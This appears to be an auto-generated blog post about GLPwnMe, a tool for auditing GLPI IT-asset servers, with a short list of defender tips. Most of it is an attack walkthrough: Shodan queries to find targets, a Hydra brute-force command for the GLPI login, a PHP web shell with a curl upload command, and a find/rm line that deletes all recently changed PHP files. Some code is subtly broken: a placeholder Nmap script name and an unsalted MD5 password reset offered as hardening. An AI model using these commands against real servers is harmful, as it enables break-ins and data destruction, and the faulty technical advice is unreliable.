Listen to this Post
Orange Cyberdefense recently released GLPwnMe, an open-source tool designed to audit and test the security of GLPI environments. GLPI, a widely used IT asset management solution, often suffers from poor patch management, weak architecture, and misconfigurations, making it a prime target for attackers.
GLPwnMe provides a comprehensive approach to assessing GLPI instances by:
– Discovering exposed GLPI instances
– Scanning for common vulnerabilities
– Brute-forcing default credentials
– Uploading PHP files (if permissions allow)
– Supporting custom exploit integration
A key ethical feature is the log.glpwnme file, which tracks actions for post-exploitation cleanup and accountability. Some modules even include an auto-cleaner to remove traces after testing.
You Should Know: Essential Commands & Techniques for GLPI Security Testing
1. Discovering GLPI Instances
Use Shodan or Censys to find exposed GLPI instances:
shodan search http.title:"GLPI" censys search "services.http.response.html_title: GLPI"
### **2. Scanning for Vulnerabilities**
Run **Nmap** to check for outdated versions:
nmap -sV --script http-vuln-cve2019-XXXX <target_IP>
### **3. Brute-Forcing Default Credentials**
Use **Hydra** for credential testing:
hydra -L users.txt -P passwords.txt <target_IP> http-post-form "/glpi/front/login.php:login_name=^USER^&login_password=^PASS^&submit=Connect:Invalid credentials"
### **4. Exploiting File Upload Vulnerabilities**
If file upload is possible, test with a simple PHP shell:
<?php system($_GET['cmd']); ?>
Upload via curl:
curl -F "[email protected]" -F "submit=Upload" http://<target_IP>/glpi/front/document.send.php
### **5. Post-Exploitation Cleanup**
Check and delete traces:
find /var/www/html/glpi -name "*.php" -mtime -1 -exec rm -f {} \;
## **What Undercode Say**
GLPI, like many IT management tools, is often deployed without proper hardening, making it an easy entry point for attackers. GLPwnMe simplifies vulnerability assessment, but ethical use is critical—always log and clean up after testing.
For defenders:
- Patch GLPI regularly (
apt update && apt upgrade glpi) - Restrict file uploads (modify `.htaccess` or PHP config)
- Monitor logs (
tail -f /var/log/apache2/glpi_access.log) - Disable default credentials (
mysql -e "UPDATE glpi.users SET password=MD5('NewSecurePass123') WHERE name='admin';")
## **Expected Output:**
A structured security report with:
- List of exposed GLPI instances
- Identified vulnerabilities (CVE references if available)
- Successful/failed login attempts
- Post-exploitation cleanup confirmation
**Reference:**
References:
Reported By: Kondah Lors – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
